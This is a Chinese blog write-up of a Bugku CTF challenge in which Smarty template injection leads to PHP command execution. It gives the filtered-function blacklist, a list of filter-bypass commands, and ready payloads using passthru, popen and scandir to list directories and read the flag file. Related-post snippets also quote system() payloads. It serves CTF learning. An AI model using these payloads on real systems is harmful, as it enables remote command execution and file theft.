bugku CTF 聪明的php

最新推荐文章于 2023-04-17 18:31:00 发布
最新推荐文章于 2023-04-17 18:31:00 发布
阅读量370 收藏 1
点赞数 1
分类专栏: ctf 文章标签: 网络安全
原文链接:https://zhuanlan.zhihu.com/p/401583380
版权

获取信息

随意传参获取到smarty提示,有可能是模板注入

验证是否为模板注入

从源码中发现/system|readfile|gz|exec|eval|cat|assert|file|fgets/i 这些函数都被过滤

课外知识点

php命令执行函数有

https://www.php.net/exec

exec — 执行一个外部程序
passthru — 执行外部程序并且显示原始输出
proc_close — 关闭由 proc_open 打开的进程并且返回进程退出码
proc_open — 执行一个命令,并且打开用来输入/输出的文件指针。
popen — 打开一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。
proc_terminate — 杀除由 proc_open 打开的进程
shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。
system — 执行外部程序,并且显示输出
scandir 列出指定路径中的文件和目录
eval — 把字符串作为PHP代码执行
assert --函数直接将传入的参数当成PHP代码执行

linux查看文件的命令

cat tac more less head tail nl static-sh paste od bzmore bzless

php文件读取函数

print r() fread() fgets() vardump()

构造payload

1.使用passthru函数找到flag文件,并读取flag文件内容

/index.php?a={passthru("ls -al /")}

获取目录文件,查看结果有两个文件比较特殊

 

查看文件内容,这里用tac,也可以用其他的linux文件读取命令

/index.php?f={passthru("tac%20/_18366")}

 

2.使用popen函数找到flag文件,并读取flag文件内容

/index.php?f={fread(popen("/bin/ls%20-al%20/","r"),2096)}

 /index.php?f={fread(popen("/bin/less%20/_18366","r"),2096)}

 

3.使用scandir函数找到flag文件,并读取flag文件内容

/index.php?f={print_r(scandir("/"))}

/index.php?f={var_dump(scandir("/"))}

 /index.php?f={fread(fopen("/_18366","r"),4096)}

 

crabin_lpb
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
聪明php(Bugku)
m0_70347972的博客
09-22 477
输入cat命令直接查看文件中的flag
二十六、bugku 聪明php
山兔的博客
09-05 183
打开网页,就看到了pass a parameter and maybe the flag file's filename is random :> 。 ?a=1随意输入参数,即可获取到smarty提示,有可能是模板注入。 验证是否为模板注入 ?a={7*7}。 random — 生成伪随机数 <?php include('./libs/Smarty.class.php'); echo "pass a parameter and maybe the flag file's filename is
BUGKU--web
lulu001128的博客
04-17 115
解题过程
Bugku web 聪明php
weixin_49633310的博客
03-17 2610
Bugku web 聪明php模板注入打开题目 模板注入 打开题目 得到提示,传递参数 随机传一个参数,得到源码 在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入 确实为smarty模板注入 常用payload {if phpinfo()}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../flag'
聪明php
m0_52432374的博客
06-15 110
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap的入门操作,...
聪明PHP
chbeloved的博客
07-27 150
看完源码啥也没有,照页面意思先传参。 怀疑是smarty注入模板。 对照被过滤的一大堆函数,剩下passthru能用。模板{if passthru()}{/if}。 Cat这些也被过滤了,就先用ls指令。 在源码查看会更整齐。 到这里也不懂那么多,随缘查法,排除var usr lib 这些不太可能的文件,就只剩那么几个,就都查一遍呗,没查几次就出flag了(用tac查) ...
BugKu_web-聪明PHP(smarty 模板注入)
羽的博客
06-30 265
一开始叫传个值进去。 得到源码: smarty模板注入 成功,说明存在模板注入,存在命令执行。 接着就是找flag了。 这里过滤了很多关键词 不过我们依然可以用passthru和tac来读取flag 注意:flag不在当前目录下,要进行目录跳转。 ls ../ ls -al / 看到一个奇怪的数字目录 读取他 tac /_13883 ...
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1792
php命令执行基础与CTF例题分析
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
bugku 聪明php
stantic的博客
03-12 517
​参考资料
BugKu_聪明php
Kobalos的博客
08-16 140
访问目标地址! 看到他的提示,随意传输一个参数,尝试传入一个a 可以看到传入的参数直接被打印了出来,并且显示了源码 先尝试一下phpinfo能不能正常打印吧, http://114.67.246.176:10575/?a=${phpinfo()} 发现phpinfo可以正常回显,回过头看源码,发现ban了大量的命令执行的函数,尝试使用passthru() http://114.67.246.176:10575/?a=${passthru(%22ls%22) 发现执行成功,然后就是漫长的找fla.
Bugku WEB 聪明PHP
qq_41696858的博客
07-07 241
1.打开场景,发现让你传个参数,那就传,?filename=1212121随便啥参数都行,然后php源码就直接给你了,很明显,是想让你绕过 2.过滤了一大堆系统命令执行函数,越过滤越说明这题是远程系统命令调用,passthru()函数并没有被过滤, 我本来想反引号绕过,后来发现,反引号绕过是exec绕过的简写,exec被禁用的话,``也就失效了 3.查看源码,是一个smarty模板,考虑模板注入,常见姿势 {} {{}} {if 函数}{/if} 命令很多,自行调用 4,关于cat被禁用 more tac
Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
csu_vc的博客
10-28 9358
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和正则表达式,在CTF比赛中常常会遇到需要处理字符或者利用正则表达式来解题的情况。例如,有些题目会提供一段加密后的字符串,参赛者需要根据加密算法进行解密,获取隐藏在其中的flag。而在其他题目中,可能会给出一段文本,并要求参赛者使用正则表达式来匹配特定的模式或者提取特定的信息。 因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值